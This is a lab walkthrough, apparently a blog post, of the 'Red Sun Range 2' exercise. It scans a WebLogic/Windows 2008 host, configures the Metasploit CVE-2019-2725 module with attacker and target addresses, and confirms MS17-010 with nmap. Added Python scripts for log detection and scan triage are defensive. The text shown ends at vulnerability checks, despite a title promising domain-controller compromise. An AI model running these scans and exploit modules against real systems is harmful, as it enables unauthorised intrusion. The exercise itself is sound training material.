news 2026/6/24 2:22:21

红日靶场二 (Red Sun Range 2): WebLogic CVE-2019-2725 to Domain Controller Compromise, Full Walkthrough


张小明

Front-end development engineer


Lab information

Related notes:

II. Information gathering

1. TCP port scan + service fingerprinting + OS detection

Tools: rustscan + nmap

nmap is given the -Pn flag, which disables host discovery. This avoids the service and OS probes failing simply because host discovery failed.

nmap's default scan logic is:

Host liveness probe (ICMP ping / TCP ping)
  ↓ no response?
  ↓ host considered down → skipped outright, no ports scanned

The problem is that many hosts (Windows in particular, and servers behind a firewall) block ICMP while their port services run perfectly well. Nmap then wrongly marks the host as down and you scan nothing at all.

Command:

sudo rustscan -a 192.168.111.80 -r 1-65535 -- -sV -O -Pn -n

Output (only the key part is kept; the full output is long):

PORT      STATE SERVICE        REASON         VERSION
80/tcp    open  http           syn-ack ttl 63 Microsoft IIS httpd 7.5
135/tcp   open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
139/tcp   open  netbios-ssn    syn-ack ttl 63 Microsoft Windows netbios-ssn
445/tcp   open  microsoft-ds   syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s       syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp  open  ms-wbt-server? syn-ack ttl 63
7001/tcp  open  http           syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
49153/tcp open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
49154/tcp open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
49176/tcp open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
49194/tcp open  msrpc          syn-ack ttl 63 Microsoft Windows RPC
60966/tcp open  ms-sql-s       syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2008|7|8.1 (94%)
OS CPE: cpe:/o:microsoft:windows_server_2008:r2 cpe:/o:microsoft:windows_7 cpe:/o:microsoft:windows_8.1
OS fingerprint not ideal because: Missing a closed TCP port so results incomplete
Aggressive OS guesses: Microsoft Windows Server 2008 R2 or Windows 7 SP1 (94%), Microsoft Windows 7 or Windows Server 2008 R2 (90%), Microsoft Windows Server 2008 R2 SP1 (88%), Microsoft Windows 7 SP1 or Windows Server 2008 R2 or Windows 8.1 (87%)
No exact OS matches for host (test conditions non-ideal).
TCP/IP fingerprint:
SCAN(V=7.98%E=4%D=3/31%OT=80%CT=%CU=%PV=Y%G=N%TM=69CB43AF%P=x86_64-pc-linux-gnu)
SEQ(SP=106%GCD=1%ISR=109%TI=I%TS=7)
SEQ(SP=109%GCD=1%ISR=108%TI=I%TS=7)
OPS(O1=M551NW8ST11%O2=M551NW8ST11%O3=M551NW8NNT11%O4=M551NW8ST11%O5=M551NW8ST11%O6=M551ST11)
WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
ECN(R=Y%DF=Y%TG=40%W=2000%O=M551NW8NNS%CC=N%Q=)
T1(R=Y%DF=Y%TG=40%S=O%A=S+%F=AS%RD=0%Q=)
T2(R=N)
T3(R=N)
T4(R=N)
U1(R=N)
IE(R=N)

Uptime guess: 0.016 days (since Tue Mar 31 11:23:47 2026)
TCP Sequence Prediction: Difficulty=265 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows

Read data files from: /usr/share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 2 IP addresses (2 hosts up) scanned in 181.06 seconds
           Raw packets sent: 198 (18.984KB) | Rcvd: 60 (3.064KB)

2. UDP scan of key ports + service fingerprinting

Add a round of UDP scanning so that key information is not missed:

Tool: Nmap

Command:

sudo nmap -sU --top-ports 20 -sV -Pn -n 192.168.111.80

Output (every port comes back open|filtered, meaning nothing answered either way, so this round adds no usable information):

Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 11:51 +0800
Nmap scan report for 192.168.111.80
Host is up.

PORT      STATE         SERVICE      VERSION
53/udp    open|filtered domain
67/udp    open|filtered dhcps
68/udp    open|filtered dhcpc
69/udp    open|filtered tftp
123/udp   open|filtered ntp
135/udp   open|filtered msrpc
137/udp   open|filtered netbios-ns
138/udp   open|filtered netbios-dgm
139/udp   open|filtered netbios-ssn
161/udp   open|filtered snmp
162/udp   open|filtered snmptrap
445/udp   open|filtered microsoft-ds
500/udp   open|filtered isakmp
514/udp   open|filtered syslog
520/udp   open|filtered route
631/udp   open|filtered ipp
1434/udp  open|filtered ms-sql-m
1900/udp  open|filtered upnp
4500/udp  open|filtered nat-t-ike
49152/udp open|filtered unknown

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 128.47 seconds

3. Priority list

Target: very likely a Windows Server 2008 R2

Architecture: almost certainly x64

Ports of interest:

PORT      STATE SERVICE        REASON         VERSION
7001/tcp  open  http           syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)

T3 is WebLogic's remote-object protocol. It is enabled by default and has a long history of deserialization vulnerabilities.

PORT      STATE SERVICE        REASON         VERSION
445/tcp   open  microsoft-ds   syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds

MS17-010 (EternalBlue) is present on 2008 R2 out of the box until the patch is applied.

III. Vulnerability discovery and verification

1. CVE-2019-2725

Look up vulnerabilities matching the fingerprint:

Note that narrowing the search keywords is not always better; sometimes loosening them surfaces richer information.

Check the CVE number:

zyf@kali:~$ searchsploit -x 46780 | head -10
  Exploit: Oracle Weblogic 10.3.6.0.0 / 12.1.3.0.0 - Remote Code Execution
      URL: https://www.exploit-db.com/exploits/46780
     Path: /usr/share/exploitdb/exploits/windows/webapps/46780.py
    Codes: CVE-2019-2725
 Verified: False
File Type: Python script, ASCII text executable, with very long lines (6251)
#!/usr/bin/python
# Exploit Title: Oracle Weblogic Exploit CVE-2019-2725

It is CVE-2019-2725. Open MSF and use the search command to find the matching module:

msfconsole

msf > search CVE-2019-2725

Matching Modules
================

   #  Name                                                          Disclosure Date  Rank       Check  Description
   -  ----                                                          ---------------  ----       -----  -----------
   0  exploit/multi/misc/weblogic_deserialize_asyncresponseservice  2019-04-23       excellent  Yes    Oracle Weblogic Server Deserialization RCE - AsyncResponseService
   1    \_ target: Unix                                             .                .          .      .
   2    \_ target: Windows                                          .                .          .      .
   3    \_ target: Solaris                                          .                .          .      .


Interact with a module by name or index. For example info 3, use 3 or use exploit/multi/misc/weblogic_deserialize_asyncresponseservice
After interacting with a module you can manually set a TARGET with set TARGET 'Solaris'

Use the module and run its check:

msf > use 0
[*] Using configured payload cmd/unix/reverse_bash
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > info

       Name: Oracle Weblogic Server Deserialization RCE - AsyncResponseService
     Module: exploit/multi/misc/weblogic_deserialize_asyncresponseservice
   Platform: Unix, Windows, Solaris
       Arch: cmd, x64, x86
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2019-04-23

Provided by:
  Andres Rodriguez - 2Secure (@acamro) <acamro@gmail.com>

Module side effects:
  ioc-in-logs

Module stability:
  crash-safe

Module reliability:
  repeatable-session

Available targets:
      Id  Name
      --  ----
  =>  0   Unix
      1   Windows
      2   Solaris

Check supported:
  Yes

Basic options:
  Name       Current Setting               Required  Description
  ----       ---------------               --------  -----------
  Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]. Supported proxies: socks5, http, socks5h, sap ni, socks4
  RHOSTS                                   yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
  RPORT      7001                          yes       The target port (TCP)
  SSL        false                         no        Negotiate SSL/TLS for outgoing connections
  TARGETURI  /_async/AsyncResponseService  yes       URL to AsyncResponseService
  VHOST                                    no        HTTP server virtual host

Payload information:

Description:
  An unauthenticated attacker with network access to the Oracle Weblogic
  Server T3 interface can send a malicious SOAP request to the interface
  WLS AsyncResponseService to execute code on the vulnerable host.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2019-2725
  http://web.archive.org/web/20190508024326/http://www.cnvd.org.cn/webinfo/show/4999
  https://www.oracle.com/technetwork/security-advisory/alert-cve-2019-2725-5466295.html
  https://twitter.com/F5Labs/status/1120822404568244224

View the full module info with the info -d command.

msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set target Windows
target => Windows
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set LHOST 192.168.111.44
LHOST => 192.168.111.44
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > set RHOST 192.168.111.80
RHOST => 192.168.111.80
msf exploit(multi/misc/weblogic_deserialize_asyncresponseservice) > check
[+] 192.168.111.80:7001 - The target is vulnerable.

The vulnerability is present.
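The module info above lists the side effect "ioc-in-logs": the SOAP request is sent to the path in TARGETURI, so every check or exploitation attempt leaves a request line in WebLogic's HTTP access log. The sweep below is an added example (not part of this write-up and not Metasploit code) that reads such a log and flags traffic to the /_async/ service, which ordinary application users have no reason to call. It assumes Common Log Format for the access log and uses a constructed trusted-admin network; both are placeholders, as are the sample log lines.

```python
"""Access-log sweep for the WebLogic AsyncResponseService endpoint.

Added example; not part of the original write-up and not Metasploit code.
The lines in SAMPLE_LOG are constructed in Common Log Format (an assumption
about the server's log configuration); TRUSTED_NETS is a made-up placeholder.
"""
import ipaddress
import re
from collections import Counter

# Path prefix of the async web service named by TARGETURI. Application users
# have no reason to call it, so any hit is worth a look (assumption).
WATCHED_PREFIXES = ("/_async/",)

# Source networks where WebLogic administration is expected (constructed).
TRUSTED_NETS = [ipaddress.ip_network("192.168.100.0/24")]

CLF = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample: two POSTs from the scanning host, an admin console visit
# and a WSDL fetch from the trusted range, ordinary app traffic, and a WSDL
# fetch from an untrusted address.
SAMPLE_LOG = """\
192.168.111.44 - - [31/Mar/2026:15:02:10 +0800] "POST /_async/AsyncResponseService HTTP/1.1" 200 0
192.168.111.44 - - [31/Mar/2026:15:02:11 +0800] "POST /_async/AsyncResponseService HTTP/1.1" 200 0
192.168.100.7 - - [31/Mar/2026:15:03:01 +0800] "GET /console/login/LoginForm.jsp HTTP/1.1" 200 8321
10.0.0.5 - - [31/Mar/2026:15:04:55 +0800] "GET /index.jsp HTTP/1.1" 200 512
192.168.111.90 - - [31/Mar/2026:15:05:20 +0800] "GET /_async/AsyncResponseService?WSDL HTTP/1.1" 200 2211
192.168.100.7 - - [31/Mar/2026:15:06:02 +0800] "GET /_async/AsyncResponseService?WSDL HTTP/1.1" 200 2211
"""


def parse_clf(line):
    """Return the fields of one Common Log Format line, or None if it does not parse."""
    m = CLF.match(line)
    return m.groupdict() if m else None


def is_trusted(ip):
    """True when the source address falls inside an expected admin network."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return False
    return any(addr in net for net in TRUSTED_NETS)


def scan_log(text):
    """Flag requests under the watched prefixes.

    POST is rated high because the module delivers its SOAP payload that way;
    a GET (for example a WSDL fetch) is rated medium as reconnaissance; hits
    from a trusted network are kept at low so they still appear in review.
    Returns (alerts, hits_per_source).
    """
    alerts, per_source = [], Counter()
    for line in text.splitlines():
        rec = parse_clf(line)
        if rec is None or not rec["path"].startswith(WATCHED_PREFIXES):
            continue
        severity = "high" if rec["method"] == "POST" else "medium"
        if is_trusted(rec["ip"]):
            severity = "low"
        alerts.append({"ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                       "path": rec["path"], "status": rec["status"],
                       "severity": severity})
        per_source[rec["ip"]] += 1
    return alerts, per_source


if __name__ == "__main__":
    found, counts = scan_log(SAMPLE_LOG)
    for a in found:
        print(f"[{a['severity']:6}] {a['ip']:15} {a['method']:4} {a['path']} ({a['status']})")
    print("hits per source:", dict(counts))
```

Repeated POSTs to the endpoint from one source that has no business with the async service are the pattern to alert on; the definitive fix remains the Oracle patch linked in the module's references, and keeping port 7001 (and T3) off untrusted network segments limits who can reach the endpoint in the first place.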

2. EternalBlue

Use Nmap's NSE script to verify whether the vulnerability is present:

┌──(zyf㉿kali)-[~/hongr2]
└─$ sudo nmap --script=smb-vuln-ms17-010 192.168.111.80 -p 445 -Pn -n
Starting Nmap 7.98 ( https://nmap.org ) at 2026-03-31 15:02 +0800
Nmap scan report for 192.168.111.80
Host is up (0.068s latency).

PORT    STATE SERVICE
445/tcp open  microsoft-ds

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|
|     Disclosure date: 2017-03-14
|     References:
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|       https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_      https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/

Nmap done: 1 IP address (1 host up) scanned in 1.99 seconds

The vulnerability is present.
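The priority list in section 3 and the NSE check above are both manual triage of Nmap text output. The script below is an added example (not part of this write-up and not Nmap code) that does the same triage in code: it parses the PORT/STATE/SERVICE/REASON/VERSION table (as printed with the REASON column, which the scan above produced) and the "Host script results" block, then applies the write-up's own reasoning as rules: a VULNERABLE NSE result first, then T3-enabled WebLogic and SMB on a Server 2008-era build, then exposed SQL Server and RDP. The sample text is constructed to mirror the scan output above, and the rule set is an illustrative assumption rather than a standard.

```python
"""Triage of Nmap normal output into a prioritised finding list.

Added example; not part of the original write-up or of Nmap. SAMPLE is
constructed to mirror the scan output above. The rules in triage() are an
illustrative assumption that encodes the write-up's own priority list.
"""
import re
from dataclasses import dataclass, field

# Table rows as printed with the REASON column ("syn-ack ttl 63"); without
# --reason the first word of VERSION would be consumed as the reason.
PORT_LINE = re.compile(
    r"^(?P<port>\d+)/(?P<proto>tcp|udp)\s+(?P<state>\S+)\s+(?P<service>\S+)\s+"
    r"(?P<reason>\S+(?: ttl \d+)?)\s*(?P<version>.*)$"
)
# Script names are lowercase-with-hyphens and end the line with a colon, which
# keeps "VULNERABLE:" and "References:" from being mistaken for script names.
SCRIPT_HEADER = re.compile(r"^\|\s*(?P<name>[a-z][\w-]*):\s*$")
SCRIPT_FIELD = re.compile(r"^\|_?\s*(?P<key>State|IDs|Risk factor):\s*(?P<value>.+)$")

SAMPLE = """\
PORT      STATE SERVICE        REASON         VERSION
445/tcp   open  microsoft-ds   syn-ack ttl 63 Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1433/tcp  open  ms-sql-s       syn-ack ttl 63 Microsoft SQL Server 2008 R2 10.50.4000; SP2
3389/tcp  open  ms-wbt-server? syn-ack ttl 63
7001/tcp  open  http           syn-ack ttl 63 Oracle WebLogic Server 10.3.6.0 (Servlet 2.5; JSP 2.1; T3 enabled)
49152/tcp open  msrpc          syn-ack ttl 63 Microsoft Windows RPC

Host script results:
| smb-vuln-ms17-010:
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|_    https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
"""


@dataclass
class Port:
    port: int
    proto: str
    state: str
    service: str
    version: str


@dataclass
class ScriptResult:
    name: str
    fields: dict = field(default_factory=dict)


def parse_ports(text):
    """Return a Port record for every table row in Nmap's normal output."""
    ports = []
    for line in text.splitlines():
        m = PORT_LINE.match(line.strip())
        if m:
            ports.append(Port(int(m["port"]), m["proto"], m["state"],
                              m["service"], m["version"].strip()))
    return ports


def parse_host_scripts(text):
    """Return ScriptResult records from the 'Host script results:' block."""
    results, current, in_block = [], None, False
    for line in text.splitlines():
        line = line.strip()
        if line.startswith("Host script results:"):
            in_block = True
            continue
        if not in_block or not line.startswith("|"):
            continue
        h = SCRIPT_HEADER.match(line)
        if h:
            current = ScriptResult(h["name"])
            results.append(current)
            continue
        f = SCRIPT_FIELD.match(line)
        if f and current is not None:
            current.fields[f["key"]] = f["value"].strip()
    return results


def triage(ports, scripts):
    """Apply the exposure rules and return (priority, message) pairs, highest first (0 = top)."""
    findings = []
    for p in ports:
        if p.state != "open":
            continue
        v = p.version.lower()
        if "weblogic" in v and "t3 enabled" in v:
            findings.append((1, f"{p.port}/{p.proto}: WebLogic with T3 enabled ({p.version}); review patch level and T3 exposure"))
        elif p.service == "microsoft-ds" and "2008" in v:
            findings.append((1, f"{p.port}/{p.proto}: SMB on a Windows Server 2008-era host; verify MS17-010 patch and SMBv1 status"))
        elif p.service == "ms-sql-s":
            findings.append((2, f"{p.port}/{p.proto}: SQL Server reachable ({p.version})"))
        elif p.service.startswith("ms-wbt-server"):
            findings.append((2, f"{p.port}/{p.proto}: RDP reachable"))
    for s in scripts:
        if s.fields.get("State", "").upper() == "VULNERABLE":
            findings.append((0, f"NSE {s.name}: {s.fields.get('IDs', '?')}, risk {s.fields.get('Risk factor', '?')}"))
    return sorted(findings, key=lambda item: item[0])


def triage_sample():
    return triage(parse_ports(SAMPLE), parse_host_scripts(SAMPLE))


if __name__ == "__main__":
    for priority, message in triage_sample():
        print(f"P{priority}  {message}")
```

Feeding a real scan file in place of SAMPLE gives the same ordered list; the point of the rules is that a confirmed NSE result outranks any version-string inference, and version-string inferences (T3 enabled, a 2008-era SMB banner) are leads to verify, not findings in themselves.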
